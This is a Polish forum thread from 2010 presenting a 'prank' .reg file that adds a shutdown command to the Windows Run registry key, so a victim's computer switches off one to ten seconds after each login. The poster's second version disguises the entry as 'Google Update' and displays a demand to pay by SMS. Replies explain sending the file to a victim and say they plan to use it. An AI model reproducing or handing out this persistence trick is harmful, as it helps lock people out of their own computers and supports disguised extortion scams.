PDA

Przejdź do pełnej wersji tego Forum : Bezczelny żart...


Sakio
20-03-2010, 14:14
Witam ;)

Chciałbym zaprezentować Wam żart, który jest śmieszny w swej prostocie a może naprawde wku*wić naszą ofiarę.

Żart w podstawowej wersji zna wiele osób. Słynny shutdown, który wyłącza komputer po x sekundach.

Myśleliście może czasem żeby napisać prościutki skrypt, który dodaje tą komende do autostartu? I ustawić czas na 1 sekunde? :piwo:

Taaaak ;) Ofiara jest bezradna... pomóc może tylko konto admina albo formatowanie dysku ;) (ewentualnie live cd albo przywracanie systemu)

Całość jest BARDZO prosta do zrobienia.

Otwieramy notatnik i wpisujemy:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
"Wylaczanie kompa"="REG_SZ:shutdown -s -t 1 -c "dowolny tekst" "

I zapisujemy w formacie .REG

Ja osobiście dodałem tak:

Windows Registry Editor Version 5.00


[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]

"Google Update"="REG_SZ:shutdown -s -t 10 -c "Aby Twój komputer ponownie działał poprawnie, wyślij sms pod numer XXXX o treści XX.XXX11" "


Nikogo nie namawiam oczywiście do czerpania korzyści w ten sposób ;)

Dodam jeszcze tyle: jeśli chcemy zmienić czas to po "-t" zmieniamy liczbe (jest to czas w sekundach [1=1s, 200=3min 20s])


Pozdrawiam i życzę miłego "wkręcania" ;D

PS. Jeśli chcemy anulować odliczanie wpisujemy w Start ---> Uruchom "shutdown -a". Pamiętajmy że jeśli damy czas 1s to nie zdążymy tego wpisać ;D


Poniżej plik z gotowym skryptem :)

Zolczi
20-03-2010, 14:31
o mamo :) tego nie znalem. no dobrze, przyda sie taka wiedza. dzieki za tutoriala ;)

marodragon
20-03-2010, 16:19
to juz przesada ale by ktos sie w****.... ;d

ndw agroo89
23-03-2010, 12:04
i jak mam to komus wysłac czy cos? czy na jego pc to wpisac?

lusa
23-03-2010, 12:23
ndw, wysłac komuś ten plik .reg a ofiara se otworzy i już automatycznie jest w d**ie i tylko reinstalka albo cudowny linux pomoże.
Swoją drogą, z shutdownem się nie bawiłem i jedyną komendę jaką znałem to shutdown -a (no parę razy tego typu wirus się zdarzył :D).

DJ_ZIELAK
03-04-2010, 12:00
Heh nienawidzę tego odliczania :)

MEFI
01-06-2010, 13:37
dobre to jest ,dzieki ,chetnie komus zrobie taki zarcik :D